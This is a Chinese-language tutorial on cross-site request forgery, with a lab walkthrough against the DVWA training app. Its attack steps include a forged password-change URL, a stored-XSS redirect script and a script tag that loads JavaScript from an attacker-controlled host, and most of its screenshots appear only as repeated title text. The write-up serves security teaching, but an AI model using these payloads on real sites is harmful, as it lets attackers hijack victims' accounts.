【安全狐】CSRF原理图及DVWA环境练习

[ CSRF ]Cross-site request forgery跨站请求伪造,也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本XSS)相比,XSS利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。

一、CSRF原理图

【安全狐】CSRF原理图及DVWA环境练习

 

  1. 受害者用密码password正常登陆服务器。
  2. 服务器通过受害者的身份验证后返回session值。
  3. 攻击者伪造一个修改密码为456的链接URL并发给受害者。
  4. 受害者点击修改密码的URL,密码由password改为了456
  5. 攻击者等待一段时间后用密码456去尝试登陆。若成功说明已修改对方密码,若失败则说明对方已发现并改回密码。
  • DVWA环境测试CSRF
  1. 低级:

(1)发送url明链接

【安全狐】CSRF原理图及DVWA环境练习

【安全狐】CSRF原理图及DVWA环境练习

抓包,用来做url链接

【安全狐】CSRF原理图及DVWA环境练习

192.168.64.132/dvwa/vulnerabilities/csrf/?password_new=456&password_conf=456&Change=Change

受害者在不知情的情况下点击黑客发送的url导致密码被修改为456

【安全狐】CSRF原理图及DVWA环境练习

尝试用456登陆受害者账户

【安全狐】CSRF原理图及DVWA环境练习

【安全狐】CSRF原理图及DVWA环境练习

成功登陆

(2) xss+url链接

【安全狐】CSRF原理图及DVWA环境练习

http://192.168.64.131/1.html

【安全狐】CSRF原理图及DVWA环境练习

【安全狐】CSRF原理图及DVWA环境练习

(3)burp-PoC

【安全狐】CSRF原理图及DVWA环境练习

【安全狐】CSRF原理图及DVWA环境练习

【安全狐】CSRF原理图及DVWA环境练习

【安全狐】CSRF原理图及DVWA环境练习

存储型xss-重定向+url超链接

<script>window.location='http://192.168.146.132/2ndex.html'</script>

【安全狐】CSRF原理图及DVWA环境练习

【安全狐】CSRF原理图及DVWA环境练习

【安全狐】CSRF原理图及DVWA环境练习

【安全狐】CSRF原理图及DVWA环境练习

中级:

【安全狐】CSRF原理图及DVWA环境练习

【安全狐】CSRF原理图及DVWA环境练习

【安全狐】CSRF原理图及DVWA环境练习

【安全狐】CSRF原理图及DVWA环境练习

【安全狐】CSRF原理图及DVWA环境练习

【安全狐】CSRF原理图及DVWA环境练习

高级:

【安全狐】CSRF原理图及DVWA环境练习

<script src=’http=192.168.146.132/a.js’></script>

【安全狐】CSRF原理图及DVWA环境练习

【安全狐】CSRF原理图及DVWA环境练习

【安全狐】CSRF原理图及DVWA环境练习

【安全狐】CSRF原理图及DVWA环境练习

【安全狐】CSRF原理图及DVWA环境练习

防御:

【安全狐】CSRF原理图及DVWA环境练习

【安全狐】CSRF原理图及DVWA环境练习